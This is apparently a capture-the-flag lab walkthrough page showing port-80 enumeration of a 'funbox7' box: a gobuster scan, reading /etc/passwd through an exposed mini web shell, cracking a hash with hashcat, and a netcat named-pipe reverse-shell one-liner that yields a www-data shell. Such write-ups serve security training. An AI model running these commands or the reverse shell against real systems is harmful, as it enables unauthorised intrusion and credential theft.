2 :80

$ gobuster dir -u http://192.168.105.132 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 70 -x php,html,txt
===============================================================
2021/08/13 10:19:37 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 323] [--> http://192.168.105.132/javascript/]
/mini.php             (Status: 200) [Size: 3828]
/robots.txt           (Status: 200) [Size: 21]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.105.132/phpmyadmin/]

http://192.168.105.132
Apache Splash Page

http://192.168.105.132/mini.php
Zerion Mini Shell v1.0

# trying to access robots.txt via mini shell
http://192.168.105.132/mini.php?filesrc=/var/www/html/robots.txt&path=/var/www/html
Allow: Enum_this_Box

# directory traversal is possible
http://192.168.105.132/mini.php?filesrc=/etc/passwd&path=/etc
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
karla:x:1000:1000:karla:/home/karla:/bin/bash
harry:x:1001:1001:,,,:/home/harry:/bin/bash
sally:x:1002:1002:,,,:/home/sally:/bin/bash
goat:x:1003:1003:,,,:/home/goat:/bin/bash
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh

$ hashcat -m 500 hash /usr/share/wordlists/rockyou.txt --show
$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:hiphop
# ssh not working with :hiphop

http://192.168.105.132/phpmyadmin/
Login Page

# upload web.php and was not able to load
# rename it to mini.php as we know we can load mini.php as php-data
# works

CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.105 6969 >/tmp/f

$ nc -lvnp 6969                                                                                                                                                                                                                       130 ⨯
listening on [any] 6969 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.132] 47718
bash: cannot set terminal process group (1178): Inappropriate ioctl for device
bash: no job control in this shell
www-data@funbox7:/var/www/html$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
funbox7
Previous3 box enum www-data > privesc > root Next1 recon
Last updated 2 years ago